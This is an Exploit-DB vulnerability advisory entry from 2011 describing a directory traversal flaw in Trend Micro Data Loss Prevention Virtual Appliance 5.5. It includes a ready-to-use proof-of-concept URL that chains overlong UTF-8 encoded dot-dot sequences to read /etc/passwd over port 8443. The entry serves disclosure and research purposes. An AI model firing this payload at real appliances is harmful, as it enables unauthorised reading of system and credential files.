Trend Micro Data Loss Prevention Virtual Appliance 5.5 - Directory Traversal

EDB-ID:

17388

CVE:





Platform:

Windows

Date:

2011-06-11


Become a Certified Penetration Tester

Enroll in Advanced Web Attacks and Exploitation , the course required to become an Offensive Security Web Expert (OSWE)

GET CERTIFIED

Software: Trend Micro Data Loss Prevention Virtual Appliance 5.5
Vulnerability: Directory Traversal
Threat Level: Serious (5/5)
Download: http://support.trendmicro.com.cn/TM- Product/Product/DLP/5.5/Manager/5.5_GM/DLPVA- 5.5.1294-i386-DVD.iso
Discovery Date: 27/05/2011
Remote: Yes

Author Site Email: Luis Martinez, Sergio Lopez,White Hat Consultores 
http://whitehatconsultores.com/ Sergio López <sergio.sh at gmail.com> Luis Martínez <luismtzsilva at gmail.com>

Description:
A directory traversal vulnerability, can be exploited to read files outside of the web root.

PoC Exploit:
https://IP:8443/dsc//%c0%ae%c0%ae/%c0%ae%c0%ae/%c 0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%a e%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c 0%ae/%c0%ae%c0%ae/etc/passwd

PDF Advisory: 
https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/17388.pdf